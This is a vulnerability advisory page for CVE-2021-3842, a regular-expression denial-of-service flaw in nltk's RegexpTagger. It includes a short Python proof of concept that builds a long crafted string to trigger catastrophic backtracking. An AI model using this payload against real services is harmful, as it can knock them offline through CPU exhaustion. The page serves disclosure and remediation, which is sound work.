Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-3842: Inefficient Regular Expression Complexity in nltk

nltk is vulnerable to Inefficient Regular Expression Complexity

CVE
#vulnerability#mac

Description

nltk is vulnerable to ReDoS attack because of ^-?[0-9]+(.[0-9]+)?$ regex. If attacker succeeds to use malicious payload against RegexpTagger used in function get_pos_tagger and malt_regex_tagger, it will cause a nasty DoS.

Proof of Concept

// PoC.py
import re, time

pattern = re.compile("^-?[0-9]+(.[0-9]+)?$")
s = "-"
s += "0" * 50000
s += "q"

t = time.time()
print("searching...")
re.search(pattern, s)
print(time.time() - t)

On my new machine I needed only 50k characters to cause a 23+ seconds matching. For instance, in similar report to this project 160k characters were processed just in 3+ seconds.

Issue

The issue here is that in ^-?[0-9]+(.[0-9]+)?$ groups [0-9]+(.[0-9]+) match each other, which causes a nasty backtracking in case of failure.

Impact

This vulnerability is capable of causing DoS due to CPU resources consumption.

Occurences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907